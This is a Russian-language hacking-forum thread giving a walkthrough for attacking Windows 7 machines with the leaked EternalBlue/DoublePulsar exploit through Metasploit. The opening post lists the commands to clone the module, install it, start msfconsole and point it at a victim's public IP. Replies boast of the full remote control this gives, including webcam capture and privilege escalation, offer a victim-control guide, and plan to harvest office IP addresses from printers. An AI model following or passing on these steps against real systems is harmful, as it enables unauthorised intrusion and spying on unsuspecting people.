Как взломать WINDOWS 7 без участия жертвы [Exploit NSA Eternalblue & Doublepulsar]

shad0w

Пользователь
Сообщения
260
Представляю вам эксплоит слитый с ресурсов АНБ, может кто-то из вас очень меньшая часть начиталась на викиликс про масштабный слив: кучу разных утилит, уязвимостей и т.д. Eternalblue & Doublepulsar Exploit одна из них, данный экслоит нацелен на remote эксплоутацию, то естьабсолютно без всякого участия жертвы. Под взлом подойдут только тачки windows 7 обеих системных архитектур.

Выбираем нужную вам папку и клонируем образ с гитхаб:

Код:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

Файл eternalblue_doublepulsar.rb копируем сюда /usr/share/metasploit-framework/modules/exploits/windows/smb

Скрины:

Ваш метасплоит должен быть обновлён до последних баз.

17164633.png



В новом окне терминала сначала запустим сервисы метасплоита и базу данных postgresql:
Код:
service postgresql start
Код:
service metasploit start

Запускаем metasploit:

Код:
msfconsole

17164647.png


17164652.png



В LHOST пишем свой локальный IP адрес, узнать можно командой:
Код:
ifconfig
В RHOST пишем публичный IP жертвы

17164720.png



Видео по теме:

А также видео с русской озвучкой:
 
Тоесть зная ip жертвы можно его комп взломать?
 
Ну и далее что делать? проник ты, узнал пароль от юзера и нихуя?
 
Да, по публичному IP из глобальной сети.

Какой нахуй пароль от юзера, ты перекурил? Показано, как получить шелл , то есть полный доступ к администрированию (управлению) ПК. После получения щелла метерпретер, открываются огромные возможности, можно получить VNC сессию, это типо как RDP дедик, можно делать захват вебкамеры, можно сделать эскалацию привеллегий, да хоть что блять можно сделать. Короче это полный доступ к ПК, равносильно того, что ПК жертвы это твой ПК.
 
Хотите FAQ по дальнейшему управлению жертвой через метерпретер шелл?
 
Опиши подробнее проблему начиная с того на каком дистрибутиве тестишь, системная архитектура процессора и тд
Пакетный менеджер все пакеты успешно обновил или какие-то не проапгрейдились? Если да, то какие?
 
Да все норм получилось , интересно а че люди ещё пользуются brute если тема рабочая ))))
 
Обязательно для этого иметь линукс ? Или можно сделать это как-то с винды ? Если можно, то как ?
 
Н*хуя себе че привалило, давай полный разбор по этой теме. И да, как из под винды замутить?
 
Я с виртуалки(kali), попробовал атаковать на сам комп(win7 x64), итог синий экран). А так норм все робит
 
Не советую, просто купи сервак linux за баксов 10-20 и играйся
 
Как защититься от этой хуйни,жертва же может быть любая)
 
Или как понять шо с твоим пк происходит дерьмо?
 
Попробуй порты закрыть , есть шанс что не просканят , обнови windows и.т.п
 
Файерволл в помощь
 
Народ!!! Тема ещ живая??? кто нить пробовал еще???
 
Ну она работает это точно, но многие пофиксили уже.
 
Забавно, нужно будет попробовать. Сейчас все молодые фирмы на семёрках работают, а если вы работаете в обслуге или чем то подобном, то можно просто находить айпишники с помощью тест листов с принтеров, которые можно получать просто подойдя к нему и нажав пару кнопок.
Как только опробую напишу сюда (если будет о чем писать).
 
Назад
Сверху